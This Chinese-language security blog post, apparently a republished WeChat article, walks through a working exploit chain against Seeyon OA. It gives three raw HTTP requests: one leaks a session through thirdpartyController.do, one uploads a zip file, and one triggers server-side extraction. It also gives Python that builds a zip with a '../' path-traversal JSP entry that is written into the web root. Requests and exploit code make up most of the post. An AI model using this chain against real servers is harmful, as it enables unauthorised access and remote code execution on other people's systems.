致远Session泄露+文件上传poc分析

致远Session泄露+文件上传poc分析
2022-9-16 09:59:59 Author: HACK安全(查看原文) 阅读量:92 收藏

接触到了这个漏洞，但是本漏洞需要上传一个zip压缩包。而且zip压缩包网上的poc是没有提供的。无奈自己只能从头分析了

网上流传的poc：https://blog.csdn.net/maverickpig/article/details/118916085

分为三个包
包一，主要是用来获取Session

POST /seeyon/thirdpartyController.do HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 133Content-Type: application/x-www-form-urlencoded
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

包二，用来上传一个zip(这里稍后会有制作ZIP的代码)

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: 获取的SessionContent-Length: 528Content-Type: multipart/form-data; boundary=2a0e9dd602fea2b6f80d3a5db1d11591
--2a0e9dd602fea2b6f80d3a5db1d11591Content-Disposition: form-data; name="file"; filename="y.zip"
zip内容--2a0e9dd602fea2b6f80d3a5db1d11591--

Zip压缩制作，在查看网上结构的时候，发现了不同，具体如下

所以用代码实现即可，会生成y.zip

import iodef write_zipFile(Filename,Content):
    with zipfile.ZipFile("y.zip", mode='a', compression=zipfile.ZIP_DEFLATED, ) as zf:        zf.writestr('layout.xml', "")        zf.writestr(Filename, Content)
Filename = "../7891.jsp"Content  = "<% out.println(new String(\"Hello\"));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>"data = write_zipFile(Filename,Content)

如果想不想生成zip的话，直接使用如下代码

    def custom_build_zip(path,content):        zip_buffer = io.BytesIO()        with zipfile.ZipFile(zip_buffer, mode='a',compression=zipfile.ZIP_DEFLATED) as zf:            zf.writestr('layout.xml', "")            zf.writestr("../"+path, content)        return zip_buffer.getvalue()

之后上传zip之后，通过返回包拿到一个ID

最终在进行解压

POST /seeyon/ajax.do HTTP/1.1Host: 获取的SessionUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: 获取的SessionContent-Type: application/x-www-form-urlencodedContent-Length: 157
method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22日期%22%2C%22获取的ID%22%5D

在解压之后，访问路径为：
localhost://seeyon/common/designer/pageLayout/压缩包jsp文件名

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NjU0MjA0Ng==&mid=2247486360&idx=1&sn=a6d9afba3692959b03dc7f5031f5b985&chksm=ce480329f93f8a3f4f4b21114d5a41bf23ca9204d6f37322da5719d635c1627cb0983d8e0e5a#rd
如有侵权请联系:admin#unsafe.sh